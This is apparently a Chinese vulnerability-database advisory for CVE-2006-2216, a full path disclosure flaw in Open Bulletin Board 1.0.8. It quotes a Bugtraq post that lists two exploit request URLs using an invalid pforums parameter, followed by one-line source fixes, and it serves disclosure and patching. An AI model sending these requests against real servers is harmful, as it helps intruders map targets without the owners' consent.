Open Bulletin Board 多个信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195114 漏洞类型 未知
发布时间 2006-05-05 更新时间 2006-05-05
CVE编号 CVE-2006-2216 CNNVD-ID CNNVD-200605-086
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/87640
https://cxsecurity.com/issue/WLB-2006050042
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-086
|漏洞详情
OpenBulletinBoard(OpenBB)1.0.8可以使远程攻击者借助对(1)misc.php和(2)member.php的无效pforums参数,获得完整的web服务器路经。
|漏洞EXP
OpenBB 1.0.8 Full Path Disclosure

Bug Found By :- Devil-00

Gr33tz :- Www.securitygurus.neT

Rock Master

Hackers Pal

n0m3rcy

-= 1-2 =-

Full Path Disclosure

Exploits :-

/OpenBB/misc.php?action=latest&pforums=D3vil-0x1

/OpenBB/member.php?action=online&&pforums=D3vil-0x1

Fix It :-

misc.php

Add This Line To '36' Line Number

[code]

$pforums = array(); # D3vil-0x1 Fix

[/code]

-------------------------------------

member.php

Add This Line To '759' Line Number

[code]

$pforums = array(); # D3vil-0x1 Fix

[/code]
|受影响的产品
Devsyn Open Bulletin Board 1.0.8
|参考资料

来源:BUGTRAQ
名称:20060428OpenBB1.0.8FullPathDisclosure
链接:http://www.securityfocus.com/archive/1/archive/1/432592/100/0/threaded
来源:XF
名称:openbb-multiple-path-disclosure(26193)
链接:http://xforce.iss.net/xforce/xfdb/26193
来源:SREASON
名称:845
链接:http://securityreason.com/securityalert/845